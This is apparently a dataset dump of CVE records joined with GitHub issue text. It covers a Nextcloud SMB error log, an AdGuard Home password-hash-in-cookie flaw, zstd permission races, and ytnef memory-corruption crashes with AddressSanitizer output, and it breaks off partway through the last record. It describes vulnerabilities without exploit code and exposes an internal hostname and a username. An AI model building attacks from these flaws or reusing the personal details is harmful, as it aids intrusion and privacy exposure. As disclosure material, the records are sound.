sensitive parameter replaced ***","smb://server1.intern.laab.gv.at/Home/thomas.stagl"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":306,"function":"getxattr","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["smb://server1.intern.laab.gv.at/Home/thomas.stagl","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":64,"function":"getAttribute","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/thomas.stagl","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":83,"function":"stat","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":113,"function":"getSize","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":188,"function":"stat","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/thomas.stagl"]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":336,"function":"getFileInfo","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["/thomas.stagl"]},{"file":"/var/www/html/lib/private/Files/Storage/Common.php","line":458,"function":"stat","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":[""]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":703,"function":"test","class":"OC\\Files\\Storage\\Common","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/MountConfig.php","line":264,"function":"test","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["*** sensitive parameter replaced ***","*** sensitive parameter replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/StoragesController.php","line":258,"function":"getBackendStatus","class":"OCA\\Files_External\\MountConfig","type":"::","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/UserGlobalStoragesController.php","line":124,"function":"updateStorageStatus","class":"OCA\\Files_External\\Controller\\StoragesController","type":"->","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":169,"function":"show","class":"OCA\\Files_External\\Controller\\UserGlobalStoragesController","type":"->","args":[1,"*** sensitive parameter replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":100,"function":"executeController","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/AppFramework/App.php","line":152,"function":"dispatch","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/Route/Router.php","line":308,"function":"main","class":"OC\\AppFramework\\App","type":"::","args":["OCA\\Files_External\\Controller\\UserGlobalStoragesController","show",{"__class__":"OC\\AppFramework\\DependencyInjection\\DIContainer"},{"action":null,"id":"1","_route":"files_external.user_global_storages.show"}]},{"file":"/var/www/html/lib/base.php","line":1008,"function":"match","class":"OC\\Route\\Router","type":"->","args":["/apps/files_external/userglobalstorages/1"]},{"file":"/var/www/html/index.php","line":37,"function":"handleRequest","class":"OC","type":"::","args":[]}],"File":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Exception/Exception.php","Line":30,"CustomMessage":"Error while getting file info"},"userAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36","version":"20.0.2.2"}
{"reqId":"9UZpPoBEZxMxTnnW1zhJ","level":3,"time":"2020-12-07T21:25:50+00:00","remoteAddr":"192.168.144.3","user":"thomas.stagl","app":"no app in context","method":"GET","url":"/index.php/apps/files_external/userglobalstorages/6?testOnly=false","message":{"Exception":"Icewind\\SMB\\Exception\\ForbiddenException","Message":"Invalid request for / (ForbiddenException)","Code":1,"Trace":[{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":66,"function":"fromMap","class":"Icewind\\SMB\\Exception\\Exception","type":"::","args":[{"1":"Icewind\\SMB\\Exception\\ForbiddenException","2":"Icewind\\SMB\\Exception\\NotFoundException","13":"Icewind\\SMB\\Exception\\ForbiddenException","16":"Icewind\\SMB\\Exception\\FileInUseException","17":"Icewind\\SMB\\Exception\\AlreadyExistsException","20":"Icewind\\SMB\\Exception\\InvalidTypeException","21":"Icewind\\SMB\\Exception\\InvalidTypeException","22":"Icewind\\SMB\\Exception\\InvalidArgumentException","28":"Icewind\\SMB\\Exception\\OutOfSpaceException","39":"Icewind\\SMB\\Exception\\NotEmptyException","103":"Icewind\\SMB\\Exception\\ConnectionAbortedException","104":"Icewind\\SMB\\Exception\\ConnectionResetException","110":"Icewind\\SMB\\Exception\\TimedOutException","111":"Icewind\\SMB\\Exception\\ConnectionRefusedException","112":"Icewind\\SMB\\Exception\\HostDownException","113":"Icewind\\SMB\\Exception\\NoRouteToHostException"},1,"/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":78,"function":"handleError","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeState.php","line":294,"function":"testResult","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["*** sensitive parameter replaced ***","smb://server1.intern.laab.gv.at/Gemeindeverwaltung/"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":306,"function":"getxattr","class":"Icewind\\SMB\\Native\\NativeState","type":"->","args":["smb://server1.intern.laab.gv.at/Gemeindeverwaltung/","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":64,"function":"getAttribute","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/","system.dos_attr.*"]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeFileInfo.php","line":83,"function":"stat","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Native/NativeShare.php","line":113,"function":"getSize","class":"Icewind\\SMB\\Native\\NativeFileInfo","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":188,"function":"stat","class":"Icewind\\SMB\\Native\\NativeShare","type":"->","args":["/"]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":336,"function":"getFileInfo","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["/"]},{"file":"/var/www/html/lib/private/Files/Storage/Common.php","line":458,"function":"stat","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":[""]},{"file":"/var/www/html/apps/files_external/lib/Lib/Storage/SMB.php","line":703,"function":"test","class":"OC\\Files\\Storage\\Common","type":"->","args":[]},{"file":"/var/www/html/apps/files_external/lib/MountConfig.php","line":264,"function":"test","class":"OCA\\Files_External\\Lib\\Storage\\SMB","type":"->","args":["*** sensitive parameter replaced ***","*** sensitive parameter replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/StoragesController.php","line":258,"function":"getBackendStatus","class":"OCA\\Files_External\\MountConfig","type":"::","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/apps/files_external/lib/Controller/UserGlobalStoragesController.php","line":124,"function":"updateStorageStatus","class":"OCA\\Files_External\\Controller\\StoragesController","type":"->","args":["*** sensitive parameters replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":169,"function":"show","class":"OCA\\Files_External\\Controller\\UserGlobalStoragesController","type":"->","args":[6,"*** sensitive parameter replaced ***"]},{"file":"/var/www/html/lib/private/AppFramework/Http/Dispatcher.php","line":100,"function":"executeController","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/AppFramework/App.php","line":152,"function":"dispatch","class":"OC\\AppFramework\\Http\\Dispatcher","type":"->","args":[{"__class__":"OCA\\Files_External\\Controller\\UserGlobalStoragesController"},"show"]},{"file":"/var/www/html/lib/private/Route/Router.php","line":308,"function":"main","class":"OC\\AppFramework\\App","type":"::","args":["OCA\\Files_External\\Controller\\UserGlobalStoragesController","show",{"__class__":"OC\\AppFramework\\DependencyInjection\\DIContainer"},{"action":null,"id":"6","_route":"files_external.user_global_storages.show"}]},{"file":"/var/www/html/lib/base.php","line":1008,"function":"match","class":"OC\\Route\\Router","type":"->","args":["/apps/files_external/userglobalstorages/6"]},{"file":"/var/www/html/index.php","line":37,"function":"handleRequest","class":"OC","type":"::","args":[]}],"File":"/var/www/html/apps/files_external/3rdparty/icewind/smb/src/Exception/Exception.php","Line":30,"CustomMessage":"Error while getting file info"},"userAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36","version":"20.0.2.2"}
</details> | Wrong (malformed) external storage credentials saved in `oc_storages_credentials` | https://api.github.com/repos/nextcloud/server/issues/24600/comments | 3 | 2020-12-07T21:33:05Z | 2021-02-01T14:10:28Z | https://github.com/nextcloud/server/issues/24600 | 758,866,869 | 24,600 | 1,733 |
CVE-2021-27935 | 2021-03-03T20:15:12.437 | An issue was discovered in AdGuard before 0.105.2. An attacker able to get the user's cookie is able to bruteforce their password offline, because the hash of the password is stored in the cookie. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/AdguardTeam/AdGuardHome/issues/2470"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/AdguardTeam/AdGuardHome/issues/2470"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:adguard:adguard_home:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8978CCDB-CABE-49C9-A3B7-9F55F8AF474F",
"versionEndExcluding": "0.105.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"522"
] | 522 | https://github.com/AdguardTeam/AdGuardHome/issues/2470 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"AdguardTeam",
"AdGuardHome"
] | It [seems]( https://github.com/AdguardTeam/AdGuardHome/blob/bdff46ec1dc8bfebaea236fef5e4ea64b4f21738/internal/home/auth.go#L279-L289 ) that the username as well as the bcrypt'ed password have their sha256 stored in the cookie.
This is a bit worrying, since an attacker able to get the cookie would not only gain access to AGH, but also be able to bruteforce offline the password. A possible way to address this would be to use a random string instead of `sha256(salt | username | bcrypt(password))`. | Hash of the password stored in the cookies | https://api.github.com/repos/AdguardTeam/AdGuardHome/issues/2470/comments | 6 | 2020-12-21T18:37:22Z | 2021-03-03T21:30:06Z | https://github.com/AdguardTeam/AdGuardHome/issues/2470 | 772,381,498 | 2,470 | 1,734 |
CVE-2021-24031 | 2021-03-04T21:15:12.743 | In the Zstandard command-line utility prior to v1.4.1, output files were created with default permissions. Correct file permissions (matching the input) would only be set at completion time. Output files could therefore be readable or writable to unintended parties. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve-assign@fb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Mailing List",
"Third Party Advisory"
],
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404"
},
{
"source": "cve-assign@fb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/facebook/zstd/issues/1630"
},
{
"source": "cve-assign@fb.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.facebook.com/security/advisories/cve-2021-24031"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Mailing List",
"Third Party Advisory"
],
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/facebook/zstd/issues/1630"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.facebook.com/security/advisories/cve-2021-24031"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:facebook:zstandard:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BB54F72-0467-43BC-B73A-DA6DC8A55FD9",
"versionEndExcluding": "1.4.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"276"
] | 276 | https://github.com/facebook/zstd/issues/1630 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"facebook",
"zstd"
] | While the final file mode is reflective of the input file, when compressing or uncompressing, the file can temporarily gain greater permissions than the input and potentially leading to security issues (especially if large files are being handled).
Example: `file` has mode 600 -> `zstd file` -> `file.zst` has mode 644 while compression is happening. (Same happens with `unzstd file.zst` and `file`) | zstd adds read permissions to files while being compressed or uncompressed | https://api.github.com/repos/facebook/zstd/issues/1630/comments | 13 | 2019-06-04T18:29:11Z | 2021-03-05T22:01:21Z | https://github.com/facebook/zstd/issues/1630 | 452,143,298 | 1,630 | 1,735 |
CVE-2021-24032 | 2021-03-04T21:15:12.963 | Beginning in v1.4.1 and prior to v1.4.9, due to an incomplete fix for CVE-2021-24031, the Zstandard command-line utility created output files with default permissions and restricted those permissions immediately afterwards. Output files could therefore momentarily be readable or writable to unintended parties. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.4,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve-assign@fb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519"
},
{
"source": "cve-assign@fb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/facebook/zstd/issues/2491"
},
{
"source": "cve-assign@fb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://www.facebook.com/security/advisories/cve-2021-24032"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/facebook/zstd/issues/2491"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.facebook.com/security/advisories/cve-2021-24032"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:facebook:zstandard:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D09560DA-1F1B-41AA-B96F-DABEE82C04D0",
"versionEndExcluding": "1.4.9",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"276"
] | 276 | https://github.com/facebook/zstd/issues/2491 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"facebook",
"zstd"
] | The patches for #1630 still create the file with the default umask, before chmod'ing down to 0600, so an attacker could still open it in the meantime. inotify can for instance help automating such an attack.
zstd should either set the mode directly through open(2), or use umask(2) before creating the file.
This is Debian bug https://bugs.debian.org/982519. | Race condition allows attacker to access world-readable destination file | https://api.github.com/repos/facebook/zstd/issues/2491/comments | 2 | 2021-02-11T07:41:51Z | 2021-02-17T22:05:35Z | https://github.com/facebook/zstd/issues/2491 | 806,153,115 | 2,491 | 1,736 |
CVE-2021-3403 | 2021-03-04T22:15:14.577 | In ytnef 1.9.3, the TNEFSubjectHandler function in lib/ytnef.c allows remote attackers to cause a denial-of-service (and potentially code execution) due to a double free which can be triggered via a crafted file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1926967"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Yeraze/ytnef/issues/85"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1926967"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Yeraze/ytnef/issues/85"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ytnef_project:ytnef:1.9.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0801E2DD-1A5E-47C8-8CF3-4B41CDE4B5D9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"415"
] | 415 | https://github.com/Yeraze/ytnef/issues/85 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Yeraze",
"ytnef"
] | While it seems there are many checks which ought to prevent various memory corruption situations it seems there's a double free that can be triggered still as of ecc9d87. With ASAN and some crafted input:
```
=================================================================
==2678633==ERROR: AddressSanitizer: attempting double-free on 0x6020000000d0 in thread T0:
#0 0x4991ad in free (/home/kali/ytnef/ytnef/.libs/ytnef+0x4991ad)
#1 0x7f0741856e4c in TNEFFree /home/kali/ytnef/lib/ytnef.c:979:3
#2 0x4c934b in main /home/kali/ytnef/ytnef/main.c:146:5
#3 0x7f07414f9d09 in __libc_start_main csu/../csu/libc-start.c:308:16
#4 0x41f3b9 in _start (/home/kali/ytnef/ytnef/.libs/ytnef+0x41f3b9)
0x6020000000d0 is located 0 bytes inside of 2-byte region [0x6020000000d0,0x6020000000d2)
freed by thread T0 here:
#0 0x4991ad in free (/home/kali/ytnef/ytnef/.libs/ytnef+0x4991ad)
#1 0x7f074184d701 in TNEFSubjectHandler /home/kali/ytnef/lib/ytnef.c:306:5
#2 0x7f07418590fb in TNEFParseFile /home/kali/ytnef/lib/ytnef.c:1075:10
#3 0x4c958a in main /home/kali/ytnef/ytnef/main.c:140:9
#4 0x7f07414f9d09 in __libc_start_main csu/../csu/libc-start.c:308:16
previously allocated by thread T0 here:
#0 0x4995a2 in calloc (/home/kali/ytnef/ytnef/.libs/ytnef+0x4995a2)
#1 0x7f074184d740 in TNEFSubjectHandler /home/kali/ytnef/lib/ytnef.c:310:24
#2 0x7f07418590fb in TNEFParseFile /home/kali/ytnef/lib/ytnef.c:1075:10
#3 0x4c958a in main /home/kali/ytnef/ytnef/main.c:140:9
#4 0x7f07414f9d09 in __libc_start_main csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: double-free (/home/kali/ytnef/ytnef/.libs/ytnef+0x4991ad) in free
==2678633==ABORTING
```
Manually instrumenting the code shows that indeed the same memory is freed twice:
```
=> TNEFSubjectHandler: freeing TNEF->subect.data (1 byte(s)) at 0x559159ed65a0
ERROR: invalid alloc size 255 at ytnef.c : 309, suspected corruption (exceeded 100 bytes)
=> TNEFFree: freeing memory at 0x559159ed65a0 of 1 byte(s)
double free or corruption (fasttop)
```
I have attached a minimal reproducer of this crash: [doublefree.zip](https://github.com/Yeraze/ytnef/files/5897873/doublefree.zip)
| Double free via TNEFSubjectHandler | https://api.github.com/repos/Yeraze/ytnef/issues/85/comments | 1 | 2021-01-30T11:51:22Z | 2021-03-05T14:06:10Z | https://github.com/Yeraze/ytnef/issues/85 | 797,400,586 | 85 | 1,737 |
CVE-2021-3404 | 2021-03-04T22:15:14.657 | In ytnef 1.9.3, the SwapWord function in lib/ytnef.c allows remote attackers to cause a denial-of-service (and potentially code execution) due to a heap buffer overflow which can be triggered via a crafted file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1926965"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Yeraze/ytnef/issues/86"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1926965"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Yeraze/ytnef/issues/86"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ytnef_project:ytnef:1.9.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0801E2DD-1A5E-47C8-8CF3-4B41CDE4B5D9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/Yeraze/ytnef/issues/86 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Yeraze",
"ytnef"
] | A heap buffer overflow can be triggered as of ecc9d87 with crafted input, despite `ytnef` recognizing that the provided input file is not valid:
```
ERROR: Checksum mismatch. Data corruption?:
```
However when built with ASAN we see that `SwapWord` attempts to read invalid memory before said error message can be printed:
```
